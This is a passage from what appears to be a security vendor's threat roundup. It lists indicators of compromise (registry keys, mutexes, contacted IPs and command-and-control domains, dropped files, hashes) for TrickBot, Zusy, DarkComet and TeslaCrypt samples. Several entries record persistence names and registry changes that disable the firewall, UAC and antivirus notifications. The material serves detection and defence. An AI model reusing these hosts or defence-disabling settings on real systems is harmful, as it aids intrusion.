@%SystemRoot%\system32\tsgqec.dll,-102  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-103  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-100  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-101  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-102  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-103  3 <HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config0  3 <HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config1  3 <HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config2  3 <HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config3  3 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV Value Name: ErrorControl  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV Value Name: DisplayName  1 Mutexes Occurrences Global\27a1e0c1-13fc-11ed-9660-001517101edf 1 Global\30977501-13fc-11ed-9660-001517215b93 1 IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 216[.]146[.]35[.]35 3 31[.]13[.]65[.]174 3 142[.]251[.]40[.]196 3 96[.]103[.]145[.]165 3 31[.]41[.]244[.]82 3 31[.]41[.]244[.]85 3 80[.]66[.]75[.]254 3 80[.]66[.]75[.]4 3 31[.]41[.]244[.]128 3 31[.]41[.]244[.]126/31 3 208[.]76[.]51[.]51 2 74[.]208[.]5[.]20 2 208[.]76[.]50[.]50 2 202[.]137[.]234[.]30 2 212[.]77[.]101[.]4 2 193[.]222[.]135[.]150 2 203[.]205[.]219[.]57 2 47[.]43[.]18[.]9 2 67[.]231[.]144[.]94 2 188[.]125[.]72[.]74 2 40[.]93[.]207[.]0/31 2 205[.]220[.]176[.]72 2 135[.]148[.]130[.]75 2 121[.]53[.]85[.]11 2 67[.]195[.]204[.]72/30 1 *See JSON for more IOCs Domain Names contacted by malware. 
Does not indicate maliciousness Occurrences 249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 3 249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 3 249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 3 249[.]5[.]55[.]69[.]in-addr[.]arpa 3 249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 3 249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 3 microsoft-com[.]mail[.]protection[.]outlook[.]com 3 microsoft[.]com 3 www[.]google[.]com 3 www[.]instagram[.]com 3 comcast[.]net 3 mx1a1[.]comcast[.]net 3 jotunheim[.]name 3 niflheimr[.]cn 3 whois[.]arin[.]net 2 whois[.]iana[.]org 2 mx-eu[.]mail[.]am0[.]yahoodns[.]net 2 aspmx[.]l[.]google[.]com 2 mta5[.]am0[.]yahoodns[.]net 2 icloud[.]com 2 cox[.]net 2 walla[.]com 2 hanmail[.]net 2 allstate[.]com 2 wp[.]pl 2 *See JSON for more IOCs Files and or directories created Occurrences %SystemRoot%\SysWOW64\config\systemprofile 3 %SystemRoot%\SysWOW64\config\systemprofile:.repos 3 %SystemRoot%\SysWOW64\fnwisxtv 1 %SystemRoot%\SysWOW64\airdnsoq 1 %SystemRoot%\SysWOW64\uclxhmik 1 %TEMP%\dnyabinr.exe 1 %TEMP%\lcxykqya.exe 1 %TEMP%\qzguacfj.exe 1 #### File Hashes  098ad43e2067c5c814cebe1fc52bdc528289c6a2cc96daf4e8bac90d1c95a0b3 2240525bf4ee830766ec33e2e3c0dfcdf871748088fcf068770fd306940c5957 693cd93fbc6bfb587ad011477ae870805725c5403260621a290f61bb0d243f47 a6b68aa5d00739401b413ed936526ea5e767824fddb4e768e03fb05dc369a6fd b9820bc7b09bfa88556efac463b7459d2f4a47f06cc953529a9782fdbefd4959 c2cb05d50c06d9ed65a7c53fb2f6b7977f2988f5fbbd928266bb8ea27723b243 d6df88c6f61812a4bb662abb8d90fb4ba7e17ae5b9351251d001b7945d7aae98 ec745df5a9e65776f76b97e9685ad86fbb130bb6a3146a7823bd94c7c6502f1d f3e93f62b4f4699a3d20e85fa3c9e8b7eb9129a15ca66720d4f677cae0c5a469 f8a2e41ea8ca0e998bcd54d8256cb538b1e32cec4e80eb810e8df003427b886b  #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella WSA #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### 
Win.Dropper.TrickBot-9960840-0 #### Indicators of Compromise • IOCs collected from dynamic analysis of 36 samples Registry Keys Occurrences <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\USERDS  36 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS Value Name: 4334c972  36 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS Value Name: 2d17e659  36 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent3  7 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent5  5 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent9  4 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent6  4 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent7  3 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent2  3 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent1  3 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent8  3 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent0  2 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IntelPowerAgent4  2 Mutexes Occurrences 98b59d0b000000cc 36 98b59d0b00000120 36 Global\{2d17e659d34601689591} 36 98b59d0b00000174 36 98b59d0b00000150 36 98b59d0b00000158 36 98b59d0b000001ac 35 98b59d0b00000308 35 98b59d0b0000043c 35 98b59d0b000004b4 35 98b59d0b000001bc 35 98b59d0b000002ec 35 98b59d0b000001f0 35 98b59d0b000001c4 35 98b59d0b0000021c 35 98b59d0b0000025c 35 98b59d0b00000294 35 98b59d0b00000320 35 98b59d0b000003d4 35 98b59d0b000003f8 35 98b59d0b000004dc 35 98b59d0b0000060c 8 98b59d0b000005cc 8 98b59d0b000004f8 8 98b59d0b00000614 7 *See JSON for more IOCs IP Addresses contacted by malware. 
Does not indicate maliciousness Occurrences 209[.]197[.]3[.]8 11 72[.]21[.]81[.]240 7 69[.]164[.]46[.]0 6 8[.]253[.]154[.]236/31 3 23[.]46[.]150[.]81 2 23[.]46[.]150[.]58 2 8[.]253[.]141[.]249 1 8[.]253[.]38[.]248 1 8[.]253[.]140[.]118 1 23[.]46[.]150[.]43 1 8[.]247[.]119[.]126 1 Domain Names contacted by malware. Does not indicate maliciousness Occurrences download[.]windowsupdate[.]com 36 adtejoyo1377[.]tk 36 Files and or directories created Occurrences %ProgramData%\c7150968.exe 1 %LOCALAPPDATA%\gusEBBF.tmp.bat 1 %ProgramData%\ba886437.exe 1 %HOMEPATH%\jfpDCC6.tmp.bat 1 %ProgramData%\63b007ed.exe 1 %HOMEPATH%\dtaE10F.tmp.bat 1 %ProgramData%\545ba94b.exe 1 %HOMEPATH%\hcv6907.tmp.bat 1 %ProgramData%\7afae1e8.exe 1 %HOMEPATH%\greA7E2.tmp.bat 1 %ProgramData%\9421c9aa.exe 1 %APPDATA%\vqpA923.tmp.bat 1 %ProgramData%\f779fb59.exe 1 %ProgramData%\xywA29.tmp.bat 1 %ProgramData%\940d0a1e.exe 1 %HOMEPATH%\jawD8CB.tmp.bat 1 %ProgramData%\a37667ce.exe 1 %HOMEPATH%\lkyB72F.tmp.bat 1 %ProgramData%\edcfad58.exe 1 %HOMEPATH%\pvf22C5.tmp.bat 1 %ProgramData%\182b8517.exe 1 %LOCALAPPDATA%\qsw15A4.tmp.bat 1 %ProgramData%\a3a20124.exe 1 %HOMEPATH%\xqh15A4.tmp.bat 1 %ProgramData%\a116e074.exe 1 *See JSON for more IOCs #### File Hashes  007a16c9f6908085a2d65e991ae691f41e7ceab17653200669b4286af82e8c12 017306c686a5a81630e746b9518106fd5e54b410b50a61f43cba7a3850b1fec8 024d73837dea32792852294b951dcb246c56442ebde4643cef6733f411f581b6 0284c0aff10ff3ca7e6078f3d8191fc9c4db42fbfb912a8cefabc937c1eca87d 02df9ec5bfb9e1bb613b5ee7d4a518bccc9f87580182f26d6e5d5a643036e3a1 03226228480f9e9d87a0370428d337023226314bd9447efccdbc03bb672ec81b 0337b9f06cda7d7a6e96ce2a29e0f004fb6df49d3b82d294a17a13604e754f86 03a89b1af244c7d20db8498d9284c20deea9462fb15db2f89b4c59a9be47c2f0 04432d06396fac85167c0a9dadf206dc50ea8527c29b943b77f192e45dbce22d 04679de514d8e3902341b314e324e6f75ba536d09da05e99958dc5b4a689de42 049f0322736b0abeec70630b9efbbd40d9a0916ce359a5a8168165d25a76e48f 
04e819e635fc974afd4ee533b478841ba581ddcff254034fdbfea6522939ef5f 05b51b8179992a7e21259d9eacdaf8b1115e51056ec0104daddda5a0810f7126 0734ea55ac016a1e6b6ac40837883a684656eec9ce857351c9f99d3c965d6501 07e4ebd0b135dbfcf1e7d2b60386c9b52fa5d154d072a5689eb3a7a2b15112d6 08da477f7c363ddbc11224260717cf6f7f48e849cff403e25559529029b8fdf4 08e9ccb010aceac1ea0c0fbb41e58c8e2552b30de500bf43e298a645f5acedf7 097f9d7400b8a8c8bf5aa5339bf18359148a533f9136cd9b6279623e4db293d7 0bde820541632a300070601291eb1c478b9d09da2b405f740d6fe92b290a45de 0be2e49c02aa297d158bd5fe213a96584455fb4cea7c24dd100b9922df2a45c5 0bf64ebc68956ea9d73858f32530c20fab4243fb09320adfd500fb94842a9888 0c29c2763f311604136a06a99fa76ed09411572cd796021b60c66806e6c8e5a9 0c6b997f98a1e58caf5a16a90317d2cb1d2474ac5c5926f26fa2b14a9299638a 0d30d3c9cf63898bb2e970ec5a54dfe868fc5f519fd6b283bd00a2d22a01a653 0da6c492cc755852c07bf7511b774e2527dce42be420f602e9445f1bb760ad33  *See JSON for more IOCs #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella N/A WSA N/A #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### Win.Trojan.Zusy-9960880-0 #### Indicators of Compromise • IOCs collected from dynamic analysis of 16 samples Registry Keys Occurrences <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH  12 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: MarkTime  12 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: Description  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: Type  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: Start  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: ErrorControl  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: ImagePath  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: DisplayName  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: WOW64  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH 
Value Name: ObjectName  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: FailureActions  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU Value Name: MarkTime  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: Group  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH Value Name: InstallTime  2 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: Description  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: Type  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: Start  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: ErrorControl  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: DisplayName  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: WOW64  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: ObjectName  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF Value Name: FailureActions  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU Value Name: Description  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU Value Name: Type  1 Mutexes Occurrences 127.0.0.1:8000:Cdefgh 3 112.74.89.58:44366:Cdefgh 3 112.74.89.58:42150:Cdefgh 1 47.100.137.128:8001:Pqrstu 1 22.23.24.56:8001:Pqrstu 1 hz122.f3322.org:8001:Cdefgh 1 112.74.89.58:35807:Cdefgh 1 112.74.89.58:46308:Cdefgh 1 101.33.196.136:3389:Cdefgh 1 127.0.0.1:8001:Cdefgh 1 183.28.28.43:8001:Abcdef 1 IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 112[.]74[.]89[.]58 6 22[.]23[.]24[.]56 1 47[.]100[.]137[.]128 1 101[.]33[.]196[.]136 1 183[.]28[.]28[.]43 1 Domain Names contacted by malware. 
Does not indicate maliciousness Occurrences hz122[.]f3322[.]org 1 Files and or directories created Occurrences %SystemRoot%\svchost.exe 4 #### File Hashes  04fa031e5d2d86f8dbe0d3b95d67ea774448df4613e8acce79f0c9a30ef041bc 2444b744b5c06e9410ee5c3baa807569fde44c5092192428de935e03d25b1edb 466ca0805173034a7b12a5ffce104bbe5ed312e7441abdb98849ae4103150d04 5a755f07d3b90ac5a2041fd04fd764c40882dd20b50f91fddbc10b8c6341591d 5b53262a14fe1dcd42d670b0488d0de11aeb7cfa84e36acb4eec0c13b5fd2d73 5ca6b22c6e7de5f0b9437970f1f9360ad4f3a74f964eb319080e347c27c6dff9 6ea5fdaa95dbe09ccbc474ba4fc9fbe796e79c02d2b4f65f223feda5643f5400 86bd70bc7bb74d3d4991b0f1c7e15ddef1d09695b3940c5fb015f2d00ce5f558 b9b344bd7005b233cbb85395f61c309938fe70e2f8a8d0b2c24441ba074f9ca5 bea6c7b4117eb1f894d830c77ddf6d4424bccb6043d0f43c257522d253321c3e c0a8a6e606e46a970cefe81f269ec6aec2a538830c2f7e03cf0eac55b135a59a c968ae3cfbbd89673b49f6bfd474eea846bdb1e2e3a7c5376dbcda5290d445ed dfc315d962da82d84b54683a849edf4e7b16bb136dbc2eb1198d35e528920103 ec6cb8ff27e33d7e69ce02885baa9c08fd5a03349a16a52590353a4ec364c464 f240b80b34fa480dc7236ddecb5c326e719a094e49df5a6f2070712650553066 fd0e616e5ebb9075c44bb6772cf8b2c46801fafdb0716636850dc2ec0fe06f8c  #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella N/A WSA #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### Win.Dropper.DarkComet-9961766-1 #### Indicators of Compromise • IOCs collected from dynamic analysis of 33 samples Registry Keys Occurrences <HKCU>\SOFTWARE\DC3_FEXEC  29 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Windows Debugger  24 <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON Value Name: UserInit  23 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: LanguageList  19 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: MicroUpdate  11 
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: svchost.exe  7 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: EnableLUA  5 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM  5 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE Value Name: EnableFirewall  4 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE Value Name: DisableNotifications  4 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: AntiVirusDisableNotify  4 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: DisableTaskMgr  3 <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER Value Name: UpdatesDisableNotify  3 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC Value Name: Start  3 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: DisableRegistryTools  3 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: rundll32  3 <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN Value Name: NoControlPanel  1 <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION  1 <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Microsoft  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Windows Updater  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Update  1 Mutexes Occurrences DC_MUTEX-<random, matching [A-Z0-9]{7}> 22 DCPERSFWBP 18 DC_MUTEX-5DND8AT 7 IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 99[.]229[.]175[.]244 1 Domain Names contacted by malware. 
Does not indicate maliciousness Occurrences pervert[.]no-ip[.]info 7 pervert2[.]no-ip[.]info 7 delvega[.]no-ip[.]org 2 wp-enhanced[.]no-ip[.]org 2 funstuff712[.]zapto[.]org 2 fflazhhf1[.]no-ip[.]org 1 darkcometss[.]no-ip[.]org 1 not4umac[.]no-ip[.]biz 1 sanderkidah[.]no-ip[.]org 1 bobolobob[.]no-ip[.]biz 1 hg-ma[.]zapto5[.]org 1 corrosivegas2010[.]zapto[.]org 1 profi555[.]no-ip[.]org 1 hg-ma[.]zapto[.]org 1 jugoboy1[.]zapto[.]org 1 hg-ma[.]zapto1[.]org 1 hg-ma[.]zapto2[.]org 1 hg-ma[.]zapto3[.]org 1 hg-ma[.]zapto4[.]org 1 jackreapez[.]zapto[.]org 1 magicmq[.]no-ip[.]org 1 kenrickm[.]no-ip[.]org 1 mrganja[.]no-ip[.]org 1 cherubi[.]no-ip[.]org 1 Files and or directories created Occurrences %APPDATA%\WinDbg 30 %APPDATA%\WinDbg\windbg.exe 29 %APPDATA%\dclogs 28 \svchost.exe 7 %TEMP%\uxcv9v 7 %TEMP%\uxcv9v.vbs 7 %HOMEPATH%\Documents\MSDCSC 6 %HOMEPATH%\Documents\MSDCSC\msdcsc.exe 6 %TEMP%\MSDCSC 5 %TEMP%\MSDCSC\msdcsc.exe 5 %SystemRoot%\SysWOW64\MSDCSC 3 %SystemRoot%\SysWOW64\MSDCSC\msdcsc.exe 3 %TEMP%\tMMjnM 1 %TEMP%\xMWbLz.vbs 1 %TEMP%\tMMjnM.vbs 1 %APPDATA%\WinDbg\msdnaa.exe 1 %TEMP%\Mi0z67 1 %HOMEPATH%\Documents\Explorer\Iexplorer.exe 1 %TEMP%\q7EVTk 1 %TEMP%\mmsHyU 1 %TEMP%\q7EVTk.vbs 1 %TEMP%\mmsHyU.vbs 1 %APPDATA%\WinUpd\WinUpdater.exe 1 %TEMP%\alRnXV 1 %TEMP%\alRnXV.vbs 1 *See JSON for more IOCs #### File Hashes  0153ea1e28f729d6604f422075202e48a599969c04c30e4a3056e3a308148eb3 050332edd1c7356a6e8a86471699135d90ba402d1f7ac0a27da39ccdb94ba0e8 07525015abc52c0820727bbfe3a29f62e1e5e0ca8af36ca8716ae5ea12e71a75 09fce07fb07b90dc54f5e72dd08d8677f62e948e6a0450e63f25cc6e22f99ff5 0a5710ed174fbee931562112147c3bf6cf8609a5f1674d0c878a6888548cb0c9 0db09a5cc0ff770b4024f14bf6b56b03c4ec599fe0499fc3a8d5da2625d93954 0f67c4df374d4e01f9838a7dc6ab174c0d8f4b5f2485b670f24c7fcdf65f3269 10f39ff02541b02857c11ca18a1cc745e075224ad510af7ad18b21dcb0d3cfa0 12449565aed227128301078ece7695cd6fbd8fb735e8f8b4238e08a1b181a651 13d377317be765d9d333e6a6d41bb83cffb606547dc308fefe0dcea87133b172 
157be56d2b1cee72ad290957752e089cd39f39c51807c6791b25b875113758ab 15c65c639231d17726fa4a2c0cef2a7975a52f5d71ba8d7e4e3e1f053c066528 16cc7eabf5a54d8b376b6de32e2591902044a558ded0a527fcc0143e1686c4af 16e972675f3d1bd26aff1accdde7925e4cd5ba6d5f2a33826d3d75606a1bc955 173cae8d47a5d796b06fdd18c951003342ad08d0aee4be2823332df003b5673a 17dbbd57df81e29f2d19aba93c1626efe92bff713ad8b8e65b449e843aff54e8 19370c555e8e7ed5133ca6efa7acc98fc360983cc04193cc195ea0c8a0bf2931 1984c2439c1acacb9ec7c6468db48017d8c2aa4e2da5829d572bb6f5050e80cd 1b7a03db77e43e04badd95d28554df1f9e3d97197605af709df0387d3bd0c1e8 1b9f9491a6d98e3de499641caa8ac736f2c6f76e4ac8960170d89fea7026c69e 1bd9838e181acb88813cdea1d228b445e06b921bff3cece199f9551522eff27d 1cd35eff6c0963356162d68f5434b19728f2805db71b5c616ff534d2c961d093 1d25e1479054eea2355385f60a9ce320af2e5ff5ff1333bfabc72518f7337056 1f3c3ebac21a63328b72317246fb5731720e1d311cdb7928543e1c13e87994d3 2066531192b69556304df9a65266a2d2e5978ae8cec323b6860eb230fd2faa79  *See JSON for more IOCs #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security N/A Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella N/A WSA N/A #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### Win.Ransomware.TeslaCrypt-9960924-0 #### Indicators of Compromise • IOCs collected from dynamic analysis of 16 samples Registry Keys Occurrences <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: EnableLinkedConnections  16 <HKU>\.DEFAULT\SOFTWARE\TRUEIMG  16 <HKCU>\SOFTWARE\TRUEIMG  16 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 Value Name: CheckSetting  16 <HKCU>\SOFTWARE\TRUEIMG Value Name: ID  16 <HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>  16 <HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> Value Name: data  16 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _lfia  1 
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _hfnk  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _kcgt  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _ppqk  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _kaol  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _abtg  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _rpua  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _raet  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _kwxa  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _ojsf  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _kiyk  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _iykv  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _hpdk  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _htkc  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _fshu  1 <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: _fanp  1 Mutexes Occurrences __xfghx__ 16 IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 74[.]220[.]199[.]6 16 64[.]190[.]63[.]111 16 Domain Names contacted by malware. 
Does not indicate maliciousness Occurrences prodocument[.]co[.]uk 16 marketathart[.]com 16 joshsawyerdesign[.]com 16 emmy2015[.]com 16 nlhomegarden[.]com 16 esbook[.]com 16 Files and or directories created Occurrences %ProgramFiles%\7-Zip\Lang\lv.txt 16 %ProgramFiles%\7-Zip\Lang\mk.txt 16 %ProgramFiles%\7-Zip\Lang\mn.txt 16 %ProgramFiles%\7-Zip\Lang\mng.txt 16 %ProgramFiles%\7-Zip\Lang\mng2.txt 16 %ProgramFiles%\7-Zip\Lang\mr.txt 16 %ProgramFiles%\7-Zip\Lang\ms.txt 16 %ProgramFiles%\7-Zip\Lang\nb.txt 16 %ProgramFiles%\7-Zip\Lang\ne.txt 16 %ProgramFiles%\7-Zip\Lang\nl.txt 16 %ProgramFiles%\7-Zip\Lang\nn.txt 16 %ProgramFiles%\7-Zip\Lang\pa-in.txt 16 %ProgramFiles%\7-Zip\Lang\pl.txt 16 %ProgramFiles%\7-Zip\Lang\ps.txt 16 %ProgramFiles%\7-Zip\Lang\pt-br.txt 16 %ProgramFiles%\7-Zip\Lang\pt.txt 16 %ProgramFiles%\7-Zip\Lang\ro.txt 16 %ProgramFiles%\7-Zip\Lang\ru.txt 16 %ProgramFiles%\7-Zip\Lang\sa.txt 16 %ProgramFiles%\7-Zip\Lang\si.txt 16 %ProgramFiles%\7-Zip\Lang\sk.txt 16 %ProgramFiles%\7-Zip\Lang\sl.txt 16 %ProgramFiles%\7-Zip\Lang\sq.txt 16 %ProgramFiles%\7-Zip\Lang\sr-spc.txt 16 %ProgramFiles%\7-Zip\Lang\sr-spl.txt 16 *See JSON for more IOCs #### File Hashes  00e862ecba1e2a71769a67fc5c27499e00c5594f6b7ed4e4114c2fe1fb43492f 144c480ed69ac652c4eb4efa5b6038d7a68ed3bca67089997b4228e1c814f7c4 1b02123c913912f44a6ef1c3c4a5a008270d9d8e802e92b4baa259135f25dc21 22f322c8241b4860c066f5ae57115c58f373753e3d8c9bede4521e5a5ed85e65 35aeb94c99b948b122f3e4bd4298107ab15cb8bbdb11b533d32666dbb1455ae3 3ba05e043bf3148202f498dcddb6bd67680f76640aef2d08f9ae1272ff85e719 41cba3025ecc75863b7a836ee00fdf2bbc2df90dffb17541b5bb1c9fcb269bd1 9223631593b46b54450b76028a69ddd837d06cd7e9b3d8e3f7bd584a46af22bf b2713458d2c3ebd4b558f8c2ce19a90bd97095ca868fd499755bf1c9cbd0c388 bdf2c5fcf72e7d7870e81ffacdd01206ed98d2446a85c28e7eaf73e26d7a6eda be9fac828e64c19e0a3fbf3c4a752d5332b7c0b849556f5388645515a29538ee c00039c0454935a5079dc801ce4420457eb9964cbed8372b5aff5c60a45fa26c 
d540b31f009a4138b5d35735fa9976522f4d5ee9e6b8dbdbde479796ebc6d4c0 dba60ef1804b4d90d74a2988fe53f044d7619f469d0ba9660e5646a1a67439cd f1ab2d7ace4656b5f3770186d088ac0644482fe43f38fe2bdb9217744d0f58c1 ff6f821dc0526f3615b1a3c37b2b14094f53d05cb0a6a753cb257cb0bcde6898  #### Coverage Product Protection Secure Endpoint Cloudlock N/A CWS Email Security Network Security Stealthwatch N/A Stealthwatch Cloud N/A Secure Malware Analytics Umbrella WSA #### Screenshots of Detection #### Secure Endpoint #### Secure Malware Analytics #### MITRE ATT&CK ### Win.Virus.Xpiro-9960895-1 #### Indicators of Compromise • IOCs collected from dynamic analysis of 23 samples Registry Keys Occurrences 